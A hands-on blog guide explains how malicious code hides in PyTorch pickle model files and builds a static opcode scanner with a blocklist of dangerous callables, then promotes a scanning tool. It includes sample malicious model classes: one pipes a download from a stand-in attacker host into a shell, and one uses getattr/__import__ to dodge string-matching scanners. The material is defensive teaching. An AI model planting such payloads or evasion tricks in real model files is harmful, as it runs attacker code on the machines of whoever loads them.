How to Detect Malware in a PyTorch Pickle File: A Hands-On Guide

Your SCA stack — Snyk, Dependabot, pip-audit — knows how to read your requirements.txt and cross-reference it against a vulnerability database. It doesn't know how to read a 5 GB .pt file you just pulled from Hugging Face.

That's a problem. A PyTorch model file isn't a static blob of floats. It contains a serialized instruction stream, and loading it can execute arbitrary code on the machine that calls torch.load(). A crafted model can spawn a reverse shell, exfiltrate environment variables, or curl-pipe-sh a payload — all before any inference happens.

PyTorch 2.6 helps. The default for torch.load() flipped to weights_only=True, which uses a restricted unpickler that refuses to import arbitrary modules. But "default" leaves room. Every torch.load(..., weights_only=False) sitting in your codebase, every pre-2.6 deployment, every legacy loader that hasn't been migrated, every notebook that opts out — all of those still run the unrestricted unpickler. The restricted version isn't impervious either; researchers have published bypasses. And weights_only=True does nothing for license risk, which is a separate axis of model-supply-chain pain that no unpickler default touches.
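Finding those opt-outs is mechanical. The following is a minimal sketch, assuming calls are spelled literally as torch.load(...); the helper name find_risky_torch_loads is hypothetical, and aliased imports (from torch import load) would need extra handling.

```python
import ast

def find_risky_torch_loads(source: str) -> list[tuple[int, str]]:
    """Return (line, reason) for torch.load calls that don't pin weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Only the literal spelling `torch.load(...)` is matched in this sketch.
        if not (isinstance(func, ast.Attribute) and func.attr == "load"
                and isinstance(func.value, ast.Name) and func.value.id == "torch"):
            continue
        kw = next((k for k in node.keywords if k.arg == "weights_only"), None)
        if kw is None:
            findings.append((node.lineno, "weights_only not set (unrestricted before 2.6)"))
        elif not (isinstance(kw.value, ast.Constant) and kw.value.value is True):
            findings.append((node.lineno, "weights_only is not literally True"))
    return findings

sample = '''
import torch
a = torch.load("a.pt")
b = torch.load("b.pt", weights_only=False)
c = torch.load("c.pt", weights_only=True)
'''
for line, reason in find_risky_torch_loads(sample):
    print(line, reason)
```

Only the first two calls in the sample are reported; the third pins weights_only=True and passes.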

The real question isn't "is torch.load() safe?" It's "do you know what every loader in your pipeline is actually doing, and can you prove it before the model ships?" The rest of this post is about answering that question by reading the bytecode statically — without ever running it.

1. The ZIP envelope

Modern PyTorch checkpoints (the default torch.save format since 1.6) aren't raw pickled bytes on disk. The file is a ZIP archive.

Rename model.pt to model.zip, extract it, and you get this:

my-model/
├── archive/
│   ├── data.pkl          <-- The metadata serialization (the pickle stream)
│   ├── version           <-- PyTorch serialization version
│   ├── bytecode/         <-- Compiled TorchScript bytecode (only if JIT was used)
│   └── data/             <-- Raw tensor weights
│       ├── 0             <-- Tensor chunk
│       ├── 1             <-- Tensor chunk
│       └── 2             <-- Tensor chunk

The tensors live in data/ as flat binary chunks. The interesting file from a security standpoint is data.pkl — a standard Python pickle stream that tells PyTorch how to reassemble the chunks back into torch.Tensor objects.

That reassembly logic runs before any tensor data is touched. Anything embedded in data.pkl that the pickle module can execute will execute first. That's the surface.
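You can inspect that layout without renaming or extracting anything. This is a minimal sketch using only the standard library; the in-memory archive is a stand-in built for illustration so the example runs without torch installed, and list_checkpoint_entries is a hypothetical helper name.

```python
import io
import pickle
import zipfile

def list_checkpoint_entries(blob: bytes) -> dict[str, int]:
    """Map each archive member to its size, without unpickling anything."""
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        return {info.filename: info.file_size for info in archive.infolist()}

# Stand-in for a real checkpoint, mimicking the layout shown above.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("archive/data.pkl", pickle.dumps({"layer.weight": "placeholder"}, protocol=2))
    z.writestr("archive/version", "3\n")
    z.writestr("archive/data/0", bytes(16))

entries = list_checkpoint_entries(buf.getvalue())
for name, size in entries.items():
    print(f"{size:>6}  {name}")
```

For a real file, pass open("model.pt", "rb").read() instead of the stand-in bytes.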

2. The Pickle Virtual Machine

Pickle isn't a data format. It's a programming language.

Python's pickle module compiles your objects into a stream of opcodes for a stack-based virtual machine and ships that stream to disk. When you load it back, the interpreter spins up the Pickle Virtual Machine (PVM) and executes those opcodes. Three parts:

The instruction stream — a linear sequence of 1-byte opcodes with optional arguments.
The stack — LIFO scratch space for values and intermediate call results.
The memo — a key-value cache so the stream can refer back to objects it already built (handles circular references).

A few representative opcodes:

I + digits + \n: parse an integer, push it to the stack.
S + quoted string + \n: parse a string, push it to the stack.
(: push a special <MARK> sentinel onto the stack — used to delimit groups.
t: pop everything down to the last mark, bundle it into a tuple, push the tuple.

None of that, by itself, is dangerous. The PVM gets dangerous because it has to support loading arbitrary Python class instances — which means it ships opcodes for importing modules (GLOBAL) and calling callables (REDUCE).
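The four opcodes listed above are enough to write a tiny program by hand. The sketch below assembles a protocol-0 stream, walks it with pickletools.genops, and then loads it; it is safe to load only because it contains no GLOBAL or REDUCE.

```python
import pickle
import pickletools

# MARK, INT 1, STRING 'a', TUPLE, STOP
stream = b"(I1\nS'a'\nt."

# genops decodes the opcodes without executing them.
ops = [(op.name, arg) for op, arg, _pos in pickletools.genops(stream)]
print(ops)

# Executing the stream on the PVM rebuilds the tuple.
value = pickle.loads(stream)
print(value)
```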

3. The exploit lives in `REDUCE`

When a Python object defines __reduce__, the pickler calls it during serialization and writes the result to the stream. In its simplest form, __reduce__ returns a two-tuple: a callable, and a tuple of args to pass it. (The tuple can carry up to six items; the first two are all an attacker needs.) During unpickling, the PVM calls the callable with those args. That's the whole mechanism.

So:

import os
import torch

class PickleBomb:
    def __reduce__(self):
        return (os.system, ("curl -s http://attacker.com/malware.sh | sh",))

torch.save(PickleBomb(), "malicious_model.pt")

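Write the same payload as a protocol-0 stream, run it through pickletools.dis(), and you get the PVM assembly below. (torch.save defaults to pickle protocol 2, which emits binary variants of these opcodes, and on Linux the pickler records os.system under its defining module, posix. The logic is identical.)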

    0: c    GLOBAL     'os system'
   11: (    MARK
   12: V    UNICODE    'curl -s http://attacker.com/malware.sh | sh'
   57: t    TUPLE      (MARK at 11)
   58: R    REDUCE
   59: .    STOP

Step through it.

Opcode `c` — resolve the symbol

Stack:  [ <built-in function system> ]

The PVM executes GLOBAL, imports os, looks up system, and pushes the function reference onto the stack.

Opcode `(` — place the mark

Stack:  [ <built-in function system>, <MARK> ]

A sentinel goes on the stack. Everything pushed after it counts as part of the upcoming args group.

Opcode `V` — push the argument string

Stack:  [ <built-in function system>, <MARK>, 'curl -s http://attacker.com/malware.sh | sh' ]

Opcode `t` — collapse to a tuple

Stack:  [ <built-in function system>, ('curl -s http://attacker.com/malware.sh | sh',) ]

Pop down to the mark, bundle into a single-element tuple, push it back.

Opcode `R` — REDUCE

Stack:  [ 0 ]  # os.system("curl ...") returns its exit code

REDUCE pops the args tuple and the callable, calls callable(*args), and pushes whatever it returned. The shell ran. The model file hasn't even loaded a tensor yet, and arbitrary code has already executed under the credentials of whoever called torch.load().
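The same five-opcode sequence can be reproduced safely by swapping in a harmless callable. This is a minimal sketch, assuming builtins.len as a stand-in for os.system; the stream is assembled by hand in protocol 0.

```python
import pickle
import pickletools

# GLOBAL, MARK, UNICODE, TUPLE, REDUCE, STOP: same shape as the exploit above,
# but the callable is builtins.len and the argument is a plain string.
stream = b"cbuiltins\nlen\n(Vabc\ntR."

pickletools.dis(stream)        # static view: nothing is called
result = pickle.loads(stream)  # dynamic view: REDUCE calls len("abc")
print(result)
```

The value returned by pickle.loads is whatever the callable returned, which is exactly why the exploit version leaves an exit code on the stack.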

4. Obfuscation

A scanner that just greps for the literal string os.system in pickle bytes will catch the example above. Real attackers don't write it like that.

The PVM has no loops or branches of its own, but it can import and call any Python callable, so you can resolve the dangerous callable indirectly:

import builtins
import torch

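class _ImportOS:
    def __reduce__(self):
        # Resolved at load time; a live module object can't be pickled directly.
        return (builtins.__import__, ("os",))

class ObfuscatedPickle:
    def __reduce__(self):
        # Unpickles to getattr(__import__("os"), "system"), with no direct
        # reference to os.system anywhere in the stream.
        return (builtins.getattr, (_ImportOS(), "system"))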

torch.save(ObfuscatedPickle(), "obfuscated_model.pt")

Disassembled (hand-assembled in protocol-0 form for readability):

    0: c    GLOBAL     'builtins getattr'
   18: (    MARK
   19: c    GLOBAL     'builtins __import__'
   40: (    MARK
   41: V    UNICODE    'os'
   45: t    TUPLE      (MARK at 40)
   46: R    REDUCE
   47: V    UNICODE    'system'
   55: t    TUPLE      (MARK at 18)
   56: R    REDUCE

No os.system anywhere in the stream. A grep-only scanner sees four strings that look innocuous on their own: builtins.getattr, builtins.__import__, 'os', 'system'. None of them matches a blocklist keyed on known-bad callables like os.system.

The first REDUCE calls __import__('os'), which returns the live os module and leaves it on the stack. The second REDUCE calls getattr(<os module>, 'system'), which resolves to the live os.system function. From there, one more REDUCE with attacker-controlled args and you're back where you started, and a scanner matching on os.system saw nothing.

The lesson: any scanner that doesn't treat builtins.getattr and builtins.__import__ as dangerous in their own right is bypassable.
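The gap between string matching and opcode walking is easy to demonstrate. The sketch below hand-assembles the obfuscated stream from the listing above and only parses it; it is never passed to pickle.loads.

```python
import pickletools

# getattr(__import__('os'), 'system'), assembled by hand in protocol 0.
stream = (
    b"cbuiltins\ngetattr\n"
    b"(cbuiltins\n__import__\n"
    b"(Vos\ntR"
    b"Vsystem\ntR"
    b"."
)

# A naive scanner looks for the callable spelled out in one piece.
naive_hit = any(needle in stream for needle in (b"os.system", b"os system", b"os\nsystem"))

# An opcode walker sees which globals the stream actually imports.
imports = [arg for op, arg, _pos in pickletools.genops(stream) if op.name == "GLOBAL"]

print(naive_hit)
print(imports)
```

The string search comes back empty, while the opcode walk surfaces both resolution primitives.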

5. A scanner you can actually run

You don't need anything beyond the standard library to do this. zipfile opens the container, pickletools.genops walks the bytecode without instantiating any of it. The whole scanner fits on a page.

import zipfile
import io
import pickletools
from typing import Set, Tuple, Optional

# Starting point — your allowlist will grow as you onboard real models.
# Production model zoos typically need _codecs, copyreg, numpy._core, and
# framework-specific custom layers added to this set.
SAFE_MODULES: Set[str] = {
    "numpy",
    "numpy.core.multiarray",
    "torch",
    "torch._utils",
    "collections",
    "typing",
}

# Callables that should never appear in a model file.
DANGEROUS_CALLABLES: Set[Tuple[str, str]] = {
    ("os", "system"),
    ("os", "popen"),
    ("subprocess", "Popen"),
    ("subprocess", "run"),
    ("subprocess", "call"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("builtins", "__import__"),  # obfuscation primitive
    ("builtins", "getattr"),     # obfuscation primitive
}


class ScanResult:
    def __init__(self, is_safe: bool, details: str):
        self.is_safe = is_safe
        self.details = details


def scan_pytorch_model(file_path: str, strict_mode: bool = False) -> ScanResult:
    """Walk the pickle stream inside a .pt file without executing any of it."""
    pickle_bytes: Optional[bytes] = None

    # Step 1: pull data.pkl out of the ZIP container (or fall back to raw pickle).
    try:
        with zipfile.ZipFile(file_path, "r") as archive:
            pkl_names = [n for n in archive.namelist() if n.endswith("data.pkl")]
            if not pkl_names:
                return ScanResult(True, "No data.pkl in archive (not a torch.save checkpoint).")
            pickle_bytes = archive.read(pkl_names[0])
    except zipfile.BadZipFile:
        # Pre-1.6 PyTorch wrote raw pickles by default, no ZIP.
        try:
            with open(file_path, "rb") as f:
                pickle_bytes = f.read()
        except Exception as e:
            return ScanResult(False, f"Failed to read file: {e}")
    except Exception as e:
        return ScanResult(False, f"Failed to open ZIP container: {e}")

    if not pickle_bytes:
        return ScanResult(False, "Empty pickle stream.")

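    # Step 2: walk opcodes, flag dangerous imports.
    # GLOBAL and INST carry "module name" inline. STACK_GLOBAL (protocol 4+) pops
    # both strings off the stack, so genops reports arg=None for it; track recent
    # string pushes and the memo just enough to recover the pair.
    string_ops = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
                  "STRING", "BINSTRING", "SHORT_BINSTRING"}
    # Pickles at protocol 2 or lower record builtins as __builtin__, and
    # os.system is defined in posix (or nt). Normalize before matching.
    aliases = {"__builtin__": "builtins", "posix": "os", "nt": "os"}
    audit = []
    stream = io.BytesIO(pickle_bytes)

    def check(module: str, name: str, pos: int) -> None:
        module = aliases.get(module, module)
        if (module, name) in DANGEROUS_CALLABLES:
            audit.append(f"[CRITICAL] {module}.{name} at byte {pos}")
        elif strict_mode and module not in SAFE_MODULES:
            audit.append(f"[WARNING] Unapproved module {module}.{name} at byte {pos}")

    try:
        # Legacy non-ZIP files hold several pickles back to back (magic number,
        # protocol version, system info, the object, storage keys) ahead of the
        # raw tensor bytes. genops stops at the first STOP, so keep reading.
        for _ in range(5):
            if stream.tell() >= len(pickle_bytes):
                break
            recent, memo = [], {}
            for opcode, arg, pos in pickletools.genops(stream):
                op = opcode.name
                if op in ("GLOBAL", "INST"):
                    module, _, name = arg.partition(" ")
                    check(module, name, pos)
                elif op == "STACK_GLOBAL":
                    pair = recent[-2:]
                    if len(pair) == 2 and all(isinstance(s, str) for s in pair):
                        check(pair[0], pair[1], pos)
                    else:
                        audit.append(f"[CRITICAL] Unresolvable STACK_GLOBAL at byte {pos}")

                # Bookkeeping for the next STACK_GLOBAL.
                if op in string_ops:
                    recent.append(arg)
                elif op in ("GET", "BINGET", "LONG_BINGET"):
                    recent.append(memo.get(arg))
                elif op == "MEMOIZE":
                    memo[len(memo)] = recent[-1] if recent else None
                elif op in ("PUT", "BINPUT", "LONG_BINPUT"):
                    memo[arg] = recent[-1] if recent else None
                elif op not in ("PROTO", "FRAME"):
                    recent.append(None)  # anything else: top of stack is unknown
                del recent[:-2]

    except Exception as e:
        # Malformed pickle could be corruption or deliberate evasion. Either way: not safe.
        return ScanResult(False, f"Bytecode parse error (possible evasion): {e}")

    if audit:
        return ScanResult(False, "\n".join(audit))
    return ScanResult(True, "Clean.")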

Three things worth noticing:

Nothing is extracted to disk. archive.read() returns bytes; io.BytesIO() wraps them in memory. A hostile archive never gets the chance to drop files during the scan itself.
pickletools.genops reads the bytecode linearly. It decodes opcodes to match them against pickle's grammar, but it never calls anything and never imports anything. That's what makes this safe to run against an untrusted file.
Both obfuscation primitives, builtins.__import__ and builtins.getattr, are on the blocklist. A legitimate model file has no reason to need either of them, and blocking the dynamic-resolution path outright closes the section 4 bypass.
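One detail any genops-based walker has to handle: pickle protocol 4 and later emit STACK_GLOBAL, which takes the module and name from the stack rather than inline, so genops reports its argument as None. The sketch below recovers the pair from the two string pushes immediately before it. It assumes no memo lookups or stack tricks intervene, and stack_global_targets is a hypothetical helper name.

```python
import pickle
import pickletools
from collections import OrderedDict

def stack_global_targets(data: bytes) -> list:
    """Pair each STACK_GLOBAL with the two string pushes right before it."""
    strings, found = [], []
    for op, arg, pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name == "STACK_GLOBAL":
            assert arg is None  # nothing inline to inspect
            found.append((tuple(strings[-2:]), pos))
        elif op.name not in ("MEMOIZE", "FRAME", "PROTO"):
            strings.clear()  # some other stack activity: stop trusting the pair
    return found

# Pickling a class by reference at protocol 4 produces a STACK_GLOBAL.
data = pickle.dumps(OrderedDict, protocol=4)
targets = stack_global_targets(data)
print(targets)
```

A walker that skips opcodes with an empty argument would pass over every import in a protocol-4 stream, so an unresolved STACK_GLOBAL is better treated as a finding than ignored.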

6. Where this approach stops working

Static scanning catches the easy 90%. It does not catch everything, and pretending otherwise is how you ship a false sense of security.

The PVM itself has no loops or branches, but a stream can call into arbitrary Python, and that is enough. An attacker can use memo slots, stack manipulation, and callable resolution split across many opcodes to construct a call that only looks dangerous at runtime, after the pieces are assembled. A static walker that doesn't simulate the stack will miss this. A simulator does better. In the limit, though, once a stream can reach eval, exec, or any other general-purpose callable, deciding whether it ends up calling os.system means deciding what arbitrary Python code does, and that is formally undecidable.
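To make "a simulator does better" concrete, here is a minimal sketch of a symbolic stack walker. It models only a handful of opcodes and folds only the two primitives from section 4; resolve_calls and fold are hypothetical names, and unmodeled opcodes raise rather than guess. The stream is parsed, never loaded.

```python
import pickletools

STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}
MARK = object()

def fold(func, args):
    """Resolve __import__ and getattr symbolically; everything else is opaque."""
    if (func == ("global", "builtins", "__import__") and isinstance(args, tuple)
            and len(args) == 1 and isinstance(args[0], str)):
        return ("module", args[0])
    if (func == ("global", "builtins", "getattr") and isinstance(args, tuple)
            and len(args) == 2 and isinstance(args[0], tuple)
            and args[0][:1] == ("module",) and isinstance(args[1], str)):
        return ("global", args[0][1], args[1])
    return None

def pop_to_mark(stack):
    items = []
    while stack:
        top = stack.pop()
        if top is MARK:
            break
        items.append(top)
    return tuple(reversed(items))

def resolve_calls(data: bytes) -> list:
    """Return the symbolic callable behind every REDUCE in the stream."""
    stack, memo, calls = [], {}, []
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name == "GLOBAL":
            module, _, attr = arg.partition(" ")
            stack.append(("global", module, attr))
        elif name == "STACK_GLOBAL":
            attr, module = stack.pop(), stack.pop()
            stack.append(("global", module, attr))
        elif name in STRING_OPS:
            stack.append(arg)
        elif name == "MARK":
            stack.append(MARK)
        elif name == "TUPLE":
            stack.append(pop_to_mark(stack))
        elif name in ("TUPLE1", "TUPLE2", "TUPLE3"):
            n = int(name[-1])
            items = tuple(stack[-n:])
            del stack[-n:]
            stack.append(items)
        elif name == "REDUCE":
            args, func = stack.pop(), stack.pop()
            calls.append(func)
            stack.append(fold(func, args))
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = stack[-1]
        elif name == "MEMOIZE":
            memo[len(memo)] = stack[-1]
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo.get(arg))
        elif name not in ("PROTO", "FRAME", "STOP"):
            raise NotImplementedError(f"opcode {name} is not modeled in this sketch")
    return calls

# getattr(__import__('os'), 'system')('echo hi'), assembled by hand.
stream = (b"cbuiltins\ngetattr\n(cbuiltins\n__import__\n(Vos\ntR"
          b"Vsystem\ntR(Vecho hi\ntR.")
calls = resolve_calls(stream)
print(calls[-1])
```

The last REDUCE resolves to os.system even though that name never appears in the stream. Every additional primitive an attacker might chain (operator.attrgetter, importlib.import_module, and so on) needs its own rule in fold, which shows how quickly the modeling burden grows.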

So the answer isn't a smarter scanner. It's layering.

graph TD
    A[Incoming ML weights] --> B[Layer 1: Static linter]
    B -- SafeTensors? --> C[Allow flat JSON headers]
    B -- PyTorch pickle? --> D[Run VM-stack simulation]
    D -- Unapproved imports found --> E[Block / fail build]
    D -- Safe imports only --> F[Layer 2: Sandbox execution]
    F --> G[Run torch.load inside restricted gVisor container]
    G --> H[Model loaded safely]

Stack-simulating linter first — it catches the obvious payloads and the obfuscation primitives. Anything that survives gets loaded in a sandbox (gVisor, an ephemeral container, whatever your platform supports) with no outbound network and a read-only filesystem. And where you can, migrate the artifact format itself: SafeTensors is a flat JSON header plus contiguous tensor bytes, with no executable component. Changing the format closes the attack surface entirely.
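The SafeTensors layout is simple enough to parse by hand: an 8-byte little-endian header length, that many bytes of JSON, then raw tensor bytes. This is a minimal sketch using only the standard library; the sample file is built in memory for illustration and read_safetensors_header is a hypothetical helper, not the safetensors library's API.

```python
import json
import struct

def read_safetensors_header(blob: bytes) -> dict:
    """Parse the JSON header: u64 little-endian length, then that many bytes of JSON."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    if header_len > len(blob) - 8:
        raise ValueError("header length exceeds file size")
    return json.loads(blob[8:8 + header_len])

# Tiny hand-built file: one float32 tensor of shape [2], backed by 8 bytes of data.
header = json.dumps({"w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]}}).encode()
blob = struct.pack("<Q", len(header)) + header + bytes(8)

parsed = read_safetensors_header(blob)
print(parsed)
```

Everything a loader needs is in that JSON dictionary: names, dtypes, shapes, and byte offsets. There is no opcode stream to execute.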

7. Skip the work

Everything above is what AIsbom does, plus the parts that don't fit in a blog post: SafeTensors header parsing, GGUF binary header parsing, license risk extraction, drift detection between scans, CycloneDX / SPDX export, weekly scans of the top 50 Hugging Face text-generation models, and a GitHub Action that comments on PRs.

One command:

pipx run --spec aisbom-cli aisbom scan hf://google-bert/bert-base-uncased

Fetches the latest release, scans BERT over HTTP without downloading the weights, prints a security + legal table, and exits. Apache 2.0, no signup, no email gate.

Model files are programs. Scan them like programs.
